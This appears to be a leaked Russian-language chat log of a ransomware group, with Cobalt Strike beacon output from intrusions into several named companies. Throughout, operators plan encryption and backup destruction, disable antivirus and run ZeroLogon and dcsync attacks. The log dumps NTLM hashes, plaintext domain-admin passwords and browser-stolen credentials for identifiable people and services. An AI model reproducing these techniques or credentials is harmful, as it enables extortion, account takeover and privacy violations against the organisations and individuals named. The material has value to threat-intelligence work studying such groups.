напомнил)а словарь брутаа как же локальный админ где нибудьну нет среди админов и нет...видимо сканер сетевой может..среди админов нету``
>description: (Left 22/03/18) PW: L3av3r2018
``это кто/что?
dn:CN=RCP Scanning,OU=Ireland,OU=Ball Users,DC=ballymoregroup,DC=local
>objectClass: top
>objectClass: person
>objectClass: organizationalPerson
>objectClass: user
>cn: RCP Scanning
>sn: Scanning
>description: Scans123
``с шансом 50%)да нет, я пока в файлах ковыряюсь. но у него там такой пздц, что быстрее пароль расхэшится))[ ](https://mediaeveryone.com/group/ballymoregroup-com?msg=gB636LLSfv3w4ygbh) просто сидим и ждем?)?это шутка то?типа чего?а все остальное...?у юзака прав нигде нет, так что ждем хэши...ВПН
```
server REG_SZ 46.34.1.2:4433
domain REG_SZ LocalDomain
user REG_SZ rpearce
owner REG_SZ BALLYMOREGROUP\rpearce
``ДК
```
Server Name IP Address
----------- ----------
BALLY44HODC1 192.0.2.246
BALLY35303 192.168.3.159
EGDC2 192.168.200.160
BGAZRDC01 10.0.180.6
``ЕА
```
Administrator CITAdmin
``ДА
```
Administrator AHarrison amihhaljova
aseymour bespadmin CITAdmin
completeit david.meadows isobtchak
jay.newell nreid rdeason
sdunn traubenheimer
``туда катят доменные кредывот кстати, раз линь в доменезначит там была цепочка из текушего в timesavers и оттуда через айтишников в линукс1.done,pkgprod.comтам сеть из 20 пк) идем к айтишникам да смотрим ихтам еще другой домен был``
192.168.5.99:445 (platform: 500 version: 6.1 name: RHEL8 domain: TIMESAVERS)
192.168.5.18:445 (platform: 500 version: 6.1 name: TSLINUX domain: TIMESAVERS)
``там прилетели еще сессии поэтому берем их в работу или доделываем из текущих открытыхОкей Кэпи на будущее блять не торопимся никогдаименно из SYSTEMименно из windows system32запуск всегда оттудаи на будущееОтработал из sys32готовоиз под винлогона пускаешь?или они ав подняли или еще чети сразу глянь процессы, стоит какой то аплокер?закинь в C:\windows\system32beacon> shell dir
[*] Tasked beacon to run: dir
[+] host called home, sent: 34 bytes
[+] received output:
Volume in drive C has no label.
Volume Serial Number is 7376-91FE
Directory of C:\hp
10/20/2020 02:36 PM .
10/20/2020 02:36 PM ...
02/09/2017 11:57 PM 9,662 csIcon.ico
08/15/2019 11:04 AM hpdiags
08/15/2019 10:57 AM hpsmh
02/11/2014 10:11 AM sslshare
10/20/2020 02:19 PM 189,440 start.exe
09/15/2016 12:46 AM 2,307 survey.dtd
10/20/2020 02:40 PM 189,440 Updater.exe
4 File(s) 390,849 bytes
5 Dir(s) 430,841,409,536 bytes freeдафайл на месте?откуда уверенность что вг нет бэкапов?+из под систем?сразуфайл попадает в корень сращуНе знаю файл не появляется. Мб он долго работает``
beacon> shell C:\hp\Updater.exe
[*] Tasked beacon to run: C:\hp\Updater.exe
[+] host called home, sent: 48 bytes
beacon> run C:\hp\Updater.exe
[*] Tasked beacon to run: C:\hp\Updater.exe
[+] host called home, sent: 35 bytes
beacon> execute C:\hp\Updater.exe
[*] Tasked beacon to execute: C:\hp\Updater.exe
[+] host called home, sent: 25 bytes
```почему?На ДК не отрабатывает локершифровать пока его не обрубили там бекапы и виртуалкиВсе зашифровано кроме дкпока домен не умерищите доступы в вгеще работануу, у них сейчас)
```
02:09 PM
``по хорошему часа через 4 только надо былд пускатьтак потому что не надо торопитьсяЭто поздно нашлизаебись)ДаLfа вы уже стали билд пускать?мм, вот уже интересно)``
[+] received output:
192.168.5.12:445
[+] received output:
192.168.5.13:445
[+] received output:
192.168.5.17:445 (platform: 500 version: 6.1 name: KEY2 domain: SAMBA)
192.168.5.18:445 (platform: 500 version: 6.1 name: TSLINUX domain: TIMESAVERS)
192.168.5.23:445
192.168.5.24:445
[+] received output:
192.168.5.25:445
192.168.5.26:445
192.168.5.27:445
192.168.5.28:445
192.168.5.30:445
[+] received output:
192.168.5.98:445 (platform: 500 version: 6.1 name: TSLINUX98 domain: WORKGROUP)
192.168.5.117:445 (platform: 500 version: 4.9 name: KEY domain: DMX)
[+] received output:
192.168.5.99:445 (platform: 500 version: 6.1 name: RHEL8 domain: TIMESAVERS)
192.168.5.188:445
192.168.5.229:445
[+] received output:
192.168.5.231:445
192.168.5.232:445
192.168.5.237:445
[+] received output:
192.168.5.240:445 (platform: 500 version: 4.9 name: TS-IX4A domain: WORKGROUP)
192.168.5.241:445 (platform: 500 version: 4.9 name: TS-IX4A domain: WORKGROUP)
192.168.5.242:445 (platform: 500 version: 4.9 name: TS-IX4B domain: WORKGROUP)
192.168.5.243:445 (platform: 500 version: 4.9 name: TS-IX4C domain: WORKGROUP)
[+] received output:
192.168.5.245:445 (platform: 500 version: 6.1 name: AS7004T-D8A5 domain: WORKGROUP)
192.168.5.246:445 (platform: 500 version: 6.1 name: AS7004T-D8E3 domain: WORKGROUP)
192.168.5.247:445 (platform: 500 version: 6.1 name: AS7004T-D8E5 domain: WORKGROUP)
192.168.5.248:445 (platform: 500 version: 6.1 name: AS7004T-D8BB domain: WORKGROUP)
Scanner module is complete
``````
/FORCEUNINSTALL Принудительно удаляет агент McAfee Agent из клиентской системы.
Пример: FrmInst.exe /FORCEUNINSTALL
``````
net share {sharename | devicename | drive:path} /DELETE
``````
Share name Comment
---------- -------
ADMIN$ Remote Admin
C$ Default share
IPC$ Remote IPC
NETLOGON Logon server share
Shares
SYSVOL Logon server share
```
как шару удалить с ДК ?перекину группу в 1.doneотпишите как проставитесотв в .exe и как нибудь start.exe или типо тогону там .ex_Его переиминовать нужно? Расширение ?не забудьте что ДК в последнюю очередьвозьмем его)``
1CvlfdsVN58QacQDIsVVwk3cXrUrgRjXN3G4R1hrWSBzYkuyww5cteLGD4ryuGnv
``Да но нужно с бой решить какой кудавам выдали билд?1) на момент когда я получил сообщения ссылка уже была не действительна
2) я их не заказывалЯ тебе 16 го числа писалего надо готовить заранееу меня его тоже неттак в этом и сутьОт куда он у нас? Быстрей сделаем быстрей заемся другимии почему именно сейчас? время не подходящееа билд у вас есть?Нужно лочить быстрейДефендер отключилв общем подготовьтепоищите как макафи отклну там насы есть какие то?))http://www.pkgprod.com/поставим билд сегодняну ладно[ ](https://mediaeveryone.com/group/pkgprod-com?msg=uRSXzYBQkq78kpC9L) да и сайт у них есть)tyТам чувак сидит делами занимается за пк счета выставляет по 2k$``
pack3009
```на авлаб похоже просто)Есть возможность чекнуть 5c9f2b00a6b5cd75dc76e2adb3369271да и трастов нетпоставьте расскан /16чет полтора пк в сети...сейчас сделаюа вы пересняли ад инфо?```
2k12server - нет
frontdesk - макАфи
pkg-101 - макАфи
timeclocksql - нет
barbara-hp-2019 - макАфи винДэф
sales2-hp-2019 - макАфи винДэф
sales1-hp-2019 - макАфи
``````
[+] received output:
192.168.168.5:22 (SSH-2.0-OpenSSH_4.3)
192.168.168.1:22 (SSH-2.0-OpenSSH_7.2)
``угуЭто два локальных юзера``
500 Administrator 6f2cc106781ba05ddc908d6e32eb1838 66048
502 krbtgt d37d5fe30400ee01f2c2d09ba1b36d9a 514
``Всегда можно посмотреть ЛАесли ты про учетку администратора она не всегда лаТы угараешь?В дисинг\а как вы узнали ла на дк?На дк всегда можно залезть при наличии локального админа котрый есть в дисингедано вы сначала залезли на дк сначалаВсе по стандартной схемеи через setntlm вернулснял logonpasswords и там был старый хэш машиной учеткимагия))как?)починил)мы же не просто так ищем далекие тихие серверас дк вычистят на раз двапотому что тут тактика "прятаться у всех на глазах" не работаетпочемудк ни в коем случае не крепимНужен закреп на ДКкак только спалят могут начать чистить сетьзалезте подальшеbeacon> pth pkgprod\linux 5c9f2b00a6b5cd75dc76e2adb3369271Работает авторизация через ДАа именно Restore stepshttps://github.com/dirkjanm/CVE-2020-1472но у нас тут только 1 дкбыл вариант пульнуть зерологон на один из дк, снять дксинк
перепрыгнуть на соседний дк, снять хэшдамп и надеяться что там еще не пошла рекпликация и есть старый хэш машиной учетки. Вернуть страый хеш машиной учетки на первом дкдо зеро работало``
beacon> shell net user "Administrator" /dom
[*] Tasked beacon to run: net user "Administrator" /dom
[+] host called home, sent: 60 bytes
[+] received output:
The request will be processed at a domain controller for domain pkgprod.local.
System error 5 has occurred.
Access is denied.
```надо поискать решение этого вопроса после использованиядоменные учетки не будут работать теперьЭто админ DCпасс``
mts9475!
```без домена?beacon> pth .\Administrator 6f2cc106781ba05ddc908d6e32eb1838даCNA вариант?нет через кобальтно молодцы, через шарперологон сделали?структурируем сервера, ав, насы, виртуализации и т дэх, тогда торопимся)через зеро сделал?beacon> dcsync pkgprod.local
[Tasked beacon to run mimikatz's @lsadump::dcsync /domain:pkgprod.local /all /csv command
[+] host called home, sent: 438858 bytes
[+] received output:
[DC] 'pkgprod.local' will be the domain
[DC] '2k12server.pkgprod.local' will be the DC server
[DC] Exporting domain 'pkgprod.local'
502 krbtgt d37d5fe30400ee01f2c2d09ba1b36d9a 514
1135 zztest 6f2cc106781ba05ddc908d6e32eb1838 66048
1121 COMPUTER-1$ 9e4861eea9caaf03ab3741219905167e 4096
1125 JODY-PC$ 1be2a00d8363e7aa06a2be68e4e99576 4096
1117 PPCCOMP$ 1fe00279412bc69c535f95a6373c5a05 4096
1138 louisold fd5ee0e622e6f6c7526cc492cd509dc5 512
1143 timesavers eb026d6c093b199f57185a49a9fa324e 512
1148 micro2 1d414494cbe8c70c4321a26bfd6cc59b 66048
1131 DAN-HP$ d14820e4d9433a47e0ceddd48d0a06f6 4096
1130 louis fd5ee0e622e6f6c7526cc492cd509dc5 66048
1141 TONY-PC$ 9c906ae5277d876ace56baad914f0051 4096
1137 PKG-100$ 2817feb5c10f33de5e24b21737abf01b 4096
1119 SUE-PC$ 26efe407363f5d03e502639bd290659c 4096
1128 WENDY-PC$ f5439870ad6502228e07201dc7af491f 4096
1146 TELEMARKETING-H$ e068b3f3a033cd63d111c5bda50b3845 4096
1149 Spare 5af88c4732565f3cff7d8dd1f6ea314f 66048
1166 mtsi cdbb81ea052f92ce3e3a3208dfc2aade 66048
1165 PAC 3179b0258923f6e05ea684640e8e8a42 512
1150 Gretta 7b3785d867105a95e9cef80c4f7a722e 66048
1168 srivera c09783c159543b16d7c4830f743e3e60 66048
1127 jon 5af88c4732565f3cff7d8dd1f6ea314f 66048
1169 TED-LAPTOP$ 16be6f44317f74a831ee08618c6c4afd 4096
1123 TELEMARKET$ 3eb0a5d8c1a23495faa2d2c87b50d71e 4096
1129 JONM-PC$ dbeacb7d9a58c1bcc110c43bccace279 4096
1159 HP-TONY$ eec4fb89b81490d370b9d9ff6cfe1911 4096
1170 mhorgan 640d1d06d738a8ac7104f5ffe9343d5b 512
1140 linux 5c9f2b00a6b5cd75dc76e2adb3369271 66048
1151 FL1 1c145fb415625cbf7eb4a8079a8be5ef 66048
1142 tony 05b073daa9c1b3b909ff5ae2e4604bb5 66048
1132 rmg f0c158a0788788e5dc9e855a35020163 66048
1136 PKG-102$ 946d6fcb5d956bb6de2da361002d06a6 4096
1120 barb 50172476292c7784efcdf8da9d415a8f 66048
500 Administrator 6f2cc106781ba05ddc908d6e32eb1838 66048
1162 jess 9bed08d5afa9d00f06ff943c9fedd570 66048
1144 micro 1d414494cbe8c70c4321a26bfd6cc59b 66048
1116 telemkt 0dc70321eb7dd2aaf63d3e3f0d520dc3 66048
1139 PKG-101$ 57fd8fff3a57275d47ed819e98fb293d 4096
1133 frontdesk 5af88c4732565f3cff7d8dd1f6ea314f 66048
1118 jen 67ba48f6c118b9c433a79a40d1ba5984 66048
1152 FL2 1c145fb415625cbf7eb4a8079a8be5ef 66048
1147 TIMECLOCKSQL$ 4f4f2298cdbddb4564c82a43d570de2d 4096
1163 SALES1-HP-2019$ 511e98171aea1fa8da652bb7a4706523 4096
1134 FRONTDESK$ a4ef2d7813cc54616741cb7c09a0fbb9 4096
1160 BARBARA-HP-2019$ 17ad6d135f6f1a081e66b72e07541519 4096
1124 jody 13cdef39a416a4c50618630f7be02479 66048
1161 SALES2-HP-2019$ 83832d2cd61cfa87e26aee2548d6eced 4096
1126 wendy 9bed08d5afa9d00f06ff943c9fedd570 66048
1145 tele d7e35af358caba17dd77018cb86fb87d 66048
1167 Ted dd7a02d47fe222b5091ef2974c69b2ec 66048
1001 2K12SERVER$ 31d6cfe0d16ae931b73c59d7e0c089c0 532480Создает нулевые файлыугу тогда на завтра оставим``
beacon> pwd
[*] Tasked beacon to print working directory
[+] host called home, sent: 8 bytes
[*] Current directory is C:\ProgramData\Adobe
beacon> run AdFind.bat
[*] Tasked beacon to run: AdFind.bat
[+] host called home, sent: 28 bytes
[+] received output:
C:\ProgramData\Adobe>adfind.exe -f "(objectcategory=person)" 1>ad_users.txt
AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015
LDAP_BIND: [] Error 0x31 (49) - Invalid Credentials
Terminating program.
C:\ProgramData\Adobe>adfind.exe -f "objectcategory=computer" 1>ad_computers.txt
AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015
LDAP_BIND: [] Error 0x31 (49) - Invalid Credentials
Terminating program.
C:\ProgramData\Adobe>adfind.exe -f "(objectcategory=organizationalUnit)" 1>ad_ous.txt
AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015
LDAP_BIND: [] Error 0x31 (49) - Invalid Credentials
Terminating program.
C:\ProgramData\Adobe>adfind.exe -subnets -f (objectCategory=subnet) 1>subnets.txt
AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015
LDAP_BIND: [] Error 0x31 (49) - Invalid Credentials
Terminating program.
C:\ProgramData\Adobe>adfind.exe -f "(objectcategory=group)" 1>ad_group.txt
AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015
LDAP_BIND: [] Error 0x31 (49) - Invalid Credentials
Terminating program.
C:\ProgramData\Adobe>adfind.exe -gcb -sc trustdmp 1>trustdmp.txt
AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015
LDAP_BIND: [] Error 0x31 (49) - Invalid Credentials
Terminating program.
```но не дает снять ад?все пингуютсяне проверяла он пинговался?при сьеме данных писал чтьо контроллер не доступенпросто дк недостуен?Я не нашел софта для впнхм, за впном?Домен не доступенкербы не снимаютсятут в сети есть эксч?ад инфо обновили? кербы пересняли и т дНе нашли кредов для перехода. Брут по списку прервался зависанием ПК(не ходит на них, но почему то показываетони не админ шарыэто ловушкаадминшары есть``
\\TIMECLOCKSQL.pkgprod.local\ADMIN$ - Remote Admin
\\TIMECLOCKSQL.pkgprod.local\C$ - Default share
\\TIMECLOCKSQL.pkgprod.local\IPC$ - Remote IPC
[+] received output:
\\FRONTDESK.pkgprod.local\ADMIN$ - Remote Admin
\\FRONTDESK.pkgprod.local\C -
\\FRONTDESK.pkgprod.local\C$ - Default share
\\FRONTDESK.pkgprod.local\D$ - Default share
\\FRONTDESK.pkgprod.local\IPC$ - Remote IPC
\\FRONTDESK.pkgprod.local\print$ - Printer Drivers
\\FRONTDESK.pkgprod.local\Users -
[+] received output:
\\Sales2-HP-2019.pkgprod.local\ADMIN$ - Remote Admin
\\Sales2-HP-2019.pkgprod.local\C$ - Default share
\\Sales2-HP-2019.pkgprod.local\IPC$ - Remote IPC
\\Sales2-HP-2019.pkgprod.local\print$ - Printer Drivers
\\Sales1-HP-2019.pkgprod.local\ADMIN$ - Remote Admin
\\Sales1-HP-2019.pkgprod.local\C$ - Default share
\\Sales1-HP-2019.pkgprod.local\IPC$ - Remote IPC
\\Sales1-HP-2019.pkgprod.local\print$ - Printer Drivers
\\PKG-102.pkgprod.local\ADMIN$ - Remote Admin
\\PKG-102.pkgprod.local\C$ - Default share
\\PKG-102.pkgprod.local\D$ - Default share
\\PKG-102.pkgprod.local\E$ - Default share
\\PKG-102.pkgprod.local\IPC$ - Remote IPC
\\PKG-102.pkgprod.local\print$ - Printer Drivers
[+] received output:
\\PKG-101.pkgprod.local\ADMIN$ - Remote Admin
\\PKG-101.pkgprod.local\C$ - Default share
\\PKG-101.pkgprod.local\D$ - Default share
\\PKG-101.pkgprod.local\E$ - Default share
\\PKG-101.pkgprod.local\G$ - Default share
\\PKG-101.pkgprod.local\IPC$ - Remote IPC
\\PKG-101.pkgprod.local\print$ - Printer Drivers
\\Barbara-HP-2019.pkgprod.local\ADMIN$ - Remote Admin
\\Barbara-HP-2019.pkgprod.local\C$ - Default share
\\Barbara-HP-2019.pkgprod.local\IPC$ - Remote IPC
\\Barbara-HP-2019.pkgprod.local\print$ - Printer Drivers
\\2k12server.pkgprod.local\ADMIN$ - Remote Admin
\\2k12server.pkgprod.local\C$ - Default share
\\2k12server.pkgprod.local\IPC$ - Remote IPC
\\2k12server.pkgprod.local\NETLOGON - Logon server share
\\2k12server.pkgprod.local\Shares -
\\2k12server.pkgprod.local\SYSVOL - Logon server share
```пока ищем другие вариантыпо поводу чистки ехе, завтра будем решать`C:\Users\jess\AppData\Local\Google\Chrome\User Data\ZxcvbnData\1`-не слышно от них ничего?нет сессийпосле закрытия просели на стотыщ часову меня две быловряд-ли, сейчас чекнунетсесии из крисп есть?конфу можно `amgusa.org`+туплю(`rawint.com`домен)``
172.93.109.18:51630
S36rQDbsTVH7D62swcBBexyxGkbNBFalsgx
```давай кобукак-то слишком много проебов сетокну раз офф, то дай мне тож тогда сетку#skytechinc-com от esxi ищем#henrystreet-org креды от сферы ищемтак чем заняты?Приветuser3 в пробке застрял, а так всевсе пришли?Привет:space_invader:всем приветспокойной ночидо завтразавтра к 5окей тогда на сегодня всеа, поняла их в сети 5не, там в сфере только три[ ](https://mediaeveryone.com/channel/general?msg=La7JvzhF8okm35g2o) мб сбросить?а и креды одни есть от трастав #corp-televisa-com-mx раскрутился и пробрался на сервак, получил новые креды, завтра как чел будет доступен закреплюсь на другой тачке и думаю на ДК всё таки попадуосталось найти керды от двух esxi и все готовоskytechinc.com
нашли еще два наса с бэкапами, всего 4
нашли керды от сферы, там три esxi, но в сети их 5, надо еще 2 найти паролив #henrystreet-org отсканены порты и проверены все веб морды, нейдены есхи и сфера, креды в процесе. Из хотя бы чего-то стоящего найденного мной:
```
https://login.symantec.com/sso/idp/SAML2
it@henrystreet.org
Hs$54321
https://my.vmware.com/web/vmware/login
amendez@henrystreet.org
H$$54321
``отпишите что за сегодня сделали``
[*] Beginning Google Chrome extraction.
--- Chromium Credential (User: mharper) ---
URL : https://www.mockflow.com/checkLogin.jsp
Username : map@waterway.com
Password : 7KA8JN&XHD4s
--- Chromium Credential (User: mharper) ---
URL : https://www.waterway.com/shop/my-account/
Username : markharper
Password : Waterway99!
--- Chromium Credential (User: mharper) ---
URL : https://www.waterway.com/shop/my-account/
Username : mharper@waterway.com
Password : Waterway99!
--- Chromium Credential (User: mharper) ---
URL : https://github.com/session
Username : mharper@waterway.com
Password : LoveUnit14
--- Chromium Credential (User: mharper) ---
URL : https://internal.waterway.com/login
Username : mharper@waterway.com
Password : Waterway99!
--- Chromium Credential (User: mharper) ---
URL : https://myaccount.google.com/
Username : waterwayapps@gmail.com
Password : wWj(9WZ&f}#z8}w^
--- Chromium Credential (User: mharper) ---
URL : https://www.paypal.com/signin
Username : markharper.pwlonghorns@gmail.com
Password : 88Maybe253!
--- Chromium Credential (User: mharper) ---
URL : https://login.live.com/ppsecure/post.srf
Username : waterwaytesting@gmail.com
Password : Waterway99!
--- Chromium Credential (User: mharper) ---
URL : https://login.live.com/ppsecure/post.srf
Username : markharper@markharper.net
Password : LoveUnit14
--- Chromium Credential (User: mharper) ---
URL : https://login.rackspace.com/
Username : wwMHarper
Password : Waterway99
--- Chromium Credential (User: mharper) ---
URL : https://stage.internal.waterway.com/login
Username : mharper@waterway.com
Password : Waterway99!
--- Chromium Credential (User: mharper) ---
URL : https://ww5.autotask.net/ClientPortal/Login.aspx
Username : mharper@waterway.com
Password : LoveUnit14!
--- Chromium Credential (User: mharper) ---
URL : https://mockflow.com/checkLogin.jsp
Username : map@waterway.com
Password : 7KA8JN&XHD4s
--- Chromium Credential (User: mharper) ---
URL : https://sso-prod.insite360.gilbarco.com/auth/realms/people/login-actions/authenticate
Username : mharper@waterway.com
Password : LoveUnit14
--- Chromium Credential (User: mharper) ---
URL : https://login.live.com/ppsecure/post.srf
Username : waterwaytesting@gmail.com
Password : Waterway99!
--- Chromium Credential (User: mharper) ---
URL : https://internal.waterway.com/login
Username : markharper
Password : Waterway99!
--- Chromium Credential (User: mharper) ---
URL : https://www.amazon.com/ap/signin
Username : mharper@waterway.com
Password : 88Maybe253!
--- Chromium Credential (User: mharper) ---
URL : https://smile.amazon.com/ap/signin
Username : mharper@waterway.com
Password : 88Maybe253!
--- Chromium Credential (User: mharper) ---
URL : https://marketing.waterway.com/Account/Login
Username : mharper@waterway.com
Password : Waterway99!
--- Chromium Credential (User: mharper) ---
URL : https://www.sendrecurring.com/login
Username : map@waterway.com
Password : JE04lvSfoZ5u
--- Chromium Credential (User: mharper) ---
URL : https://account.ui.com/login
Username : WaterwayIT
Password : Waterway99!
--- Chromium Credential (User: mharper) ---
URL : https://id.atlassian.com/signup/invite
Username : mharper@waterway.com
Password : LoveUnit14#
--- Chromium Credential (User: mharper) ---
URL : https://accounts.google.com/signin/v2/challenge/password/empty
Username : waterwayapps@gmail.com
Password : wWj(9WZ&f}#z8}w^
--- Chromium Credential (User: mharper) ---
URL : https://prtg.waterway.com/public/checklogin.htm
Username : mharper@waterway.com
Password : Waterway99
--- Chromium Credential (User: mharper) ---
URL : https://www.deskperk.com/account/login/
Username : mharper@waterway.com
Password : Waterway99!
--- Chromium Credential (User: mharper) ---
URL :
Username : markharper.pwlonghorns@gmail.com
Password : 88Maybe253
--- Chromium Credential (User: mharper) ---
URL :
Username : mharper98
Password : 88Maybe253
--- Chromium Credential (User: mharper) ---
URL : https://id.logi.com/
Username : mharper@waterway.com
Password : LoveUnit14%
--- Chromium Credential (User: mharper) ---
URL : https://ncentral.waterway.com/
Username : mharper@waterway.com
Password : Waterway99!
--- Chromium Credential (User: mharper) ---
URL : https://ncentral.waterway.com/
Username : mharper@waterway.com
Password : Waterway99!
--- Chromium Credential (User: mharper) ---
URL :
Username : mharper@waterway.com
Password : LoveUnit14%
[*] Finished Google Chrome extraction.
[*] Beginning Edge extraction.
--- Chromium Credential (User: mharper) ---
URL : https://id.atlassian.com/signup/invite
Username : mharper@waterway.com
Password : LoveUnit14#
[*] Finished Edge extraction.
[Done.
```
```
[*] Beginning Google Chrome extraction.
--- Chromium Credential (User: gkeller) ---
URL : https://designcloud.mockflow.com/checkLogin.jsp
Username : gkeller@waterway.com
Password : Waterway99
--- Chromium Credential (User: gkeller) ---
URL : https://login.microsoftonline.com/common/login
Username : gkeller@waterway.com
Password : W
--- Chromium Credential (User: gkeller) ---
URL : https://id.atlassian.com/login
Username : gkeller@waterway.com
Password : GKoct2015!
--- Chromium Credential (User: gkeller) ---
URL : http://pdiprodweb/FocalPoint/Login.aspx
Username : waterway\gkeller
Password : GKoct2015!
--- Chromium Credential (User: gkeller) ---
URL : https://github.com/session
Username : gkellerww
Password : GKoct2015!
--- Chromium Credential (User: gkeller) ---
URL : https://smartscan.controlscan.com/security/login
Username : 65000001503764
Password : u7i2jwPWZdfCwcU
--- Chromium Credential (User: gkeller) ---
URL : https://waterway.zendesk.com/access/login
Username : gkeller@waterway.com
Password : GKoct2015!
--- Chromium Credential (User: gkeller) ---
URL : https://waterway1578930554.zendesk.com/access/login
Username : gkeller@waterway.com
Password : GKoct2015!
--- Chromium Credential (User: gkeller) ---
URL : https://www.mockflow.com/checkLogin.jsp
Username : gkeller@waterway.com
Password : Waterway99
[*] Finished Google Chrome extraction.
[Done.
```
```
[*] Beginning Google Chrome extraction.
[+] received output:
--- Chromium Credential (User: mapusatera) ---
URL: https://auth.monday.com/users/invitation/accept
Username : 3146293823
Password : BlML#D6oJ155
--- Chromium Credential (User: mapusatera) ---
URL : https://waterwaycarwash.monday.com/users/sign_in
Username : 3146293823
Password : BlML#D6oJ155
--- Chromium Credential (User: mapusatera) ---
URL : https://www.cnn.com/account/register
Username : 63367
Password : Wf$.tP-sF2Z4pF*
--- Chromium Credential (User: mapusatera) ---
URL : https://aim.luminatehealth.com/login
Username : michaelpusatera@gmail.com
Password : kUVkch.4M.YBR9X
--- Chromium Credential (User: mapusatera) ---
URL :
Username : michaelpusatera@gmail.com
Password : 715Drew
--- Chromium Credential (User: mapusatera) ---
URL : https://www.hollisterco.com/shop/OrderItemDisplayView
Username :
Password : N-nC2c*bTB_C-v-
--- Chromium Credential (User: mapusatera) ---
URL : https://shop.lululemon.com/shop/checkout/confirmation
Username : amybrinkman13@gmail.com
Password : fws5z&mQtf5WUVH
--- Chromium Credential (User: mapusatera) ---
URL : https://www.ae.com/us/en/cart
Username : morganpusatera@icloud.com
Password : ILOVEDANCE123
[*] Finished Google Chrome extraction.
[*] Beginning Edge extraction.
--- Chromium Credential (User: mapusatera) ---
URL : https://system.netsuite.com/
Username : mpusatera@sotelsystems.com
Password :
--- Chromium Credential (User: mapusatera) ---
URL : https://login5.silverpop.com/
Username : transact@waterway.com
Password : $tqMy2K5%T#r
--- Chromium Credential (User: mapusatera) ---
URL : http://wwsql01/
Username : sa
Password : sa
--- Chromium Credential (User: mapusatera) ---
URL : https://login.live.com/
Username : map@waterway.com
Password :
--- Chromium Credential (User: mapusatera) ---
URL : http://reportserver.waterway.com/
Username : sa
Password :
--- Chromium Credential (User: mapusatera) ---
URL : https://login5.silverpop.com/
Username : map@waterway.com
Password : %0%f#rC!5vJj
--- Chromium Credential (User: mapusatera) ---
URL : https://mail.datotel.com/
Username : hd@waterway.com
Password : Waterway1
--- Chromium Credential (User: mapusatera) ---
URL : http://reportserver.waterway.com/
Username : waterway\administrator
Password :
--- Chromium Credential (User: mapusatera) ---
URL : https://signin.quicken.com/
Username : michaelpusatera@gmail.com
Password :
--- Chromium Credential (User: mapusatera) ---
URL : https://www.waterway.com/
Username : michaelpusatera@gmail.com
Password : fgSrBr%2#cJx
--- Chromium Credential (User: mapusatera) ---
URL : https://login.live.com/
Username : michaelpusatera@gmail.com
Password : Richie42
[*] Finished Edge extraction.
[Done.
```
```
[*] Beginning Google Chrome extraction.
[+] received output:
[*] Finished Google Chrome extraction.
[Done.
``прокси только оставьте которую выдали для почтсверните серверные сесии и остальноетут видимо на пнсвежиеснимите мне их браузеры еще разок``
CurrentUser : WATERWAY\mharper
Idletime : 00h:46m:59s:672ms (2819672 milliseconds)
```
```
CurrentUser : WATERWAY\gkeller
Idletime : 02h:09m:38s:235ms (7778235 milliseconds)
```
```
CurrentUser : WATERWAY\mapusatera
Idletime : 06h:51m:32s:968ms (24692968 milliseconds)
```
```
CurrentUser : WATERWAY\djarden
Idletime : 03h:05m:02s:093ms (11102093 milliseconds)
```скрины - лок экранбез движения?если не придут то сворачиваем на пнпол часика мониторимна серверах пока сесии усыпите на больший интерваля еще надеюсь что они придутперенесем на пол часика готовностьравновато они свали....это gkeller``
====== IdleTime
CurrentUser : WATERWAY\gkeller
Idletime : 01h:43m:42s:781ms (6222781 milliseconds
```минуткуа именно грега остальные живы?бляоф комп7арпер вышел5 мин готовностьнета доступы в слэк есть?@ot проснись тебя потерялидайте скрин с харперагде у нас офистим?скрины делаете регулярно и проверяйте на наличие шухеравы смотрите за админами активнымичерез 10 мин будем писать10 минага отличносервера сейчас притянемеще что было из бэкапов?батники готовы
расшар дисков готов
нимблы открытынимблнцентр и рок спайс на готове[ ](https://mediaeveryone.com/group/waterway-com?msg=Jzd3FE6Gachm5XwXx) ?знаете что подготовить?готовность 10 минс впном пока проблемыдау вас деплой батника же убивает процесы?``
WWDC2.waterway.com [192.168.0.222]
WWDC1.waterway.com [192.168.0.228]
PDIPRODWEB.waterway.com [192.168.0.192]
PDIPRODSQL.waterway.com [192.168.0.191]
PDITESTSQL.waterway.com [192.168.0.127]
WWSQL.waterway.com [192.168.0.189]
WWSQL2.waterway.com [192.168.0.213]
WWSQL02.waterway.com [192.168.0.59]
REPORTING.waterway.com [192.168.0.217]
WWSQL2OLD.waterway.com [192.168.0.83]
PDIPRODWEB2016.waterway.com [192.168.0.60]
WW2K1.waterway.com [192.168.0.204]
WWHV-CLUSTER-1.waterway.com [192.168.0.8]
WWHV-CLUSTER-2.waterway.com [192.168.0.7]
WWHV01.waterway.com [192.168.0.6]
WWHV02.waterway.com [192.168.0.190]
WWHV03.waterway.com [192.168.0.1]
WWHV04.waterway.com [192.168.0.2]
WWHV63.waterway.com [192.168.63.20]
```
сервера``
104.243.37.111 (Windows 2019 Standard x64)
u: Administrator
p: BXj0o3XD8JbXeXH
``````
104.171.117.198 (Windows Server 2012 x64)
u: Administrator
p: l037zI#fU.MX
``````
23.92.210.210
u: Administrator
p: fmsbS4wy6NaASrTu
``кидаю доступы к 3 дедикамnoасус бэкап не нашли?щас пинганем все и готовыспасибо @user4так давно есть уже SharpSharesNGможете сразу подготовить автоматизацию деплоя скрипта расшарыDomain Admins
```
WATERWAY\djarden MyNewPassword6*
WATERWAY\Quser pdiC1137qu!
WATERWAY\Administrator 1853Gators
WATERWAY\datavault Waterway727
WATERWAY\domainrestore Waterway727
WATERWAY\mapusatera Gators1853
WATERWAY\veeam_admin 99Waterway
WATERWAY\Applied Waterway99
WATERWAY\DBunte Waterway99
WATERWAY\gkeller Waterway76
WATERWAY\SEnglert Waterway99!
WATERWAY\blauer 11915Admin2179!
WATERWAY\mharper LoveUnit14
